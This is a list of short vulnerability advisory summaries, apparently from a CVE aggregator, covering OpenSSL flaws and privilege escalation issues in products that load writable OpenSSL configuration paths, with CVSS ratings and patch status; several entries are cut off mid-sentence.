OpenSSL's PKCS#7 signature verification fails to validate ASN1_TYPE union members before access, allowing attackers to trigger null pointer dereference crashes by submitting malformed PKCS#7 data. Applications performing signature verification or using PKCS7_digest_from_attributes() directly are vulnerable to denial of service attacks. A patch is available to address this type confusion vulnerability.

Processing a malformed PKCS#12 file in OpenSSL and related TLS libraries can trigger a null pointer dereference due to improper type validation in ASN.1 parsing, causing applications to crash. This vulnerability requires local user interaction to exploit and results only in denial of service, with no impact on data confidentiality or integrity. A patch is available to address this medium-severity issue.

Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer dereference in the PKCS12_item_decrypt_d2i_ex() function. Impact summary: A NULL pointer dereference can trigger a crash which leads to Denial of Service for an application processing PKCS#12 files. [CVSS 7.5 HIGH]

Issue summary: A type confusion vulnerability exists in the TimeStamp Response verification code where an ASN1_TYPE union member is accessed without first validating the type, causing an invalid or NULL pointer dereference when processing a malformed TimeStamp Response file. [CVSS 7.5 HIGH]

Issue summary: Calling PKCS12_get_friendlyname() function on a maliciously crafted PKCS#12 file with a BMPString (UTF-16BE) friendly name containing non-ASCII BMP code point can trigger a one byte write before the allocated buffer. [CVSS 7.4 HIGH]

Issue summary: When using the low-level OCB API directly with AES-NI or<br>other hardware-accelerated code paths, inputs whose length is not a multiple<br>of 16 bytes can leave the final partial block unencrypted and unauthenticated.<br><br>Impact summary: The trailing 1-15 bytes of a message may be exposed in<br>cleartext on encryption and are not covered by the authentication tag,<br>allowing an attacker to read or tamper with those bytes without detection.<br><br>The low-level OCB encrypt and decrypt routines in the hardware-accelerated<br>stream path process full 16-byte blocks but do not advance the input/output<br>pointers. [CVSS 4.0 MEDIUM]

Issue summary: Writing large, newline-free data into a BIO chain using the line-buffering filter where the next BIO performs short writes can trigger a heap-based out-of-bounds write. [CVSS 4.7 MEDIUM]

Issue summary: A TLS 1.3 connection using certificate compression can be forced to allocate a large buffer before decompression without checking against the configured certificate size limit. [CVSS 5.9 MEDIUM]

Issue summary: The 'openssl dgst' command-line tool silently truncates input data to 16MB when using one-shot signing algorithms and reports success instead of an error. [CVSS 5.5 MEDIUM]

Issue summary: If an application using the SSL_CIPHER_find() function in a QUIC protocol client or server receives an unknown cipher suite from the peer, a NULL dereference occurs. [CVSS 5.9 MEDIUM]

OpenSSL has a critical out-of-bounds write when parsing CMS AuthEnvelopedData/EnvelopedData with malicious AEAD parameters, enabling potential RCE.

Issue summary: PBMAC1 parameters in PKCS#12 files are missing validation which can trigger a stack-based buffer overflow, invalid pointer or NULL pointer dereference during MAC verification. [CVSS 6.1 MEDIUM]

A memory leak in Node.js’s OpenSSL integration occurs when converting `X.509` certificate fields to UTF-8 without freeing the allocated buffer. [CVSS 7.5 HIGH]

Improper IV handling in libtpms 0.10.0 and 0.10.1 causes the library to return initial instead of final initialization vectors during symmetric cipher operations with OpenSSL 3.x, potentially weakening cryptographic security for local users who can interact with the TPM emulation. Public exploit code exists for this vulnerability affecting confidentiality of encrypted data. Update to libtpms 0.10.2 to remediate.

The GC-AGENTS-SERVICE running as part of Akamai´s Guardicore Platform Agent for Windows versions prior to v49.20.1, v50.15.0, v51.12.0, v52.2.0 is affected by a local privilege escalation vulnerability. The service will attempt to read an OpenSSL configuration file from a non-existent location that standard Windows users have default write access to. This allows an unprivileged local user to create a crafted "openssl.cnf" file in that location and, by specifying the path to a custom DLL file in a custom OpenSSL engine definition, execute arbitrary commands with the privileges of the Guardicore Agent process. Since Guardicore Agent runs with SYSTEM privileges, this permits an unprivileged user to fully elevate privileges to SYSTEM level in this manner.

DuckDB is a SQL database management system. Rated medium severity (CVSS 6.9), this vulnerability is remotely exploitable, no authentication required, low attack complexity.

In Zabbix Agent and Agent 2 on Windows, the OpenSSL configuration file is loaded from a path writable by low-privileged users, allowing malicious modification and potential local privilege escalation by injecting a DLL.

Issue summary: An application using the OpenSSL HTTP client API functions may trigger an out-of-bounds read if the 'no_proxy' environment variable is set and the host portion of the authority. Rated medium severity (CVSS 5.9), this vulnerability is remotely exploitable, no authentication required. No vendor patch available.

Issue summary: A timing side-channel which could potentially allow remote recovery of the private key exists in the SM2 algorithm implementation on 64 bit ARM platforms. Rated medium severity (CVSS 6.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

Issue summary: An application trying to decrypt CMS messages encrypted using password based encryption can trigger an out-of-bounds read and write. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

glib-networking's OpenSSL backend fails to properly check the return value of memory allocation routines. Rated low severity (CVSS 3.7), this vulnerability is remotely exploitable, no authentication required. No vendor patch available.

glib-networking's OpenSSL backend fails to properly check the return value of a call to BIO_write(), resulting in an out of bounds read. Rated medium severity (CVSS 4.8), this vulnerability is remotely exploitable, no authentication required. No vendor patch available.

Vasion Print (formerly PrinterLogic) Virtual Appliance Host versions prior to 22.0.1002 and Application versions prior to 20.0.2614 (VA and SaaS deployments) contain multiple Docker containers that. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Vasion Print (formerly PrinterLogic) Virtual Appliance Host versions prior to 22.0.893 and Application versions prior to 20.0.2140 (macOS/Linux client deployments) are built against OpenSSL. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Improper Restriction of Operations within the Bounds of a Memory Buffer (CWE-119) in the OpenSSL-based session module in AxxonSoft Axxon One (C-Werk) 2.0.6 and earlier on Windows allows a remote. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

SAP NetWeaver AS Java application uses Adobe Document Service, installed with a vulnerable version of OpenSSL.Successful exploitation of known vulnerabilities in the outdated OpenSSL library would. Rated low severity (CVSS 3.4), this vulnerability is low attack complexity. No vendor patch available.

NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. Rated high severity (CVSS 7.8), this vulnerability is low attack complexity. No vendor patch available.

ruby-jwt v3.0.0.beta1 was discovered to contain weak encryption. Rated critical severity (CVSS 9.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

CVE-2025-4662 is a security vulnerability (CVSS 4.4). Remediation should follow standard vulnerability management procedures.

A flaw was found in libssh when using the ChaCha20 cipher with the OpenSSL library.

A security vulnerability in libssh (CVSS 5.0). Remediation should follow standard vulnerability management procedures.

A security vulnerability in OpenSSL 3.0.0 through 3.3.2 on the PowerPC architecture (CVSS 5.3). Remediation should follow standard vulnerability management procedures.

Local privilege escalation vulnerability in Action1 where an attacker with low-privileged code execution can exploit an insecure OpenSSL configuration file loading mechanism to achieve SYSTEM-level code execution. The vulnerability requires prior code execution capability on the target system but presents a direct path to full system compromise once initial access is obtained. No active exploitation or public POC has been confirmed at this time, but the moderate CVSS score of 7.8 and CWE-427 classification indicate a meaningful risk to Action1 users.

Icinga 2 is a monitoring system which checks the availability of network resources, notifies users of outages, and generates performance data for reporting. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity.

Issue summary: Use of -addreject option with the openssl x509 application adds a trusted use instead of a rejected use for a certificate. Rated medium severity (CVSS 6.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity.

Actualizer is a single shell script solution to allow developers and embedded engineers to create Debian operating systems (OS). Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

conda-forge openssl-feedstock before 066e83c (2024-05-20), on Microsoft Windows, configures OpenSSL to use an OPENSSLDIR file path that can be written to by non-privilged local users. Rated high severity (CVSS 7.0), this vulnerability is low attack complexity. Public exploit code available.

JRuby-OpenSSL is an add-on gem for JRuby that emulates the Ruby OpenSSL native library. Rated medium severity (CVSS 5.7), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

Bdrive NetDrive Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. Rated high severity (CVSS 7.8), this vulnerability is low attack complexity. No vendor patch available.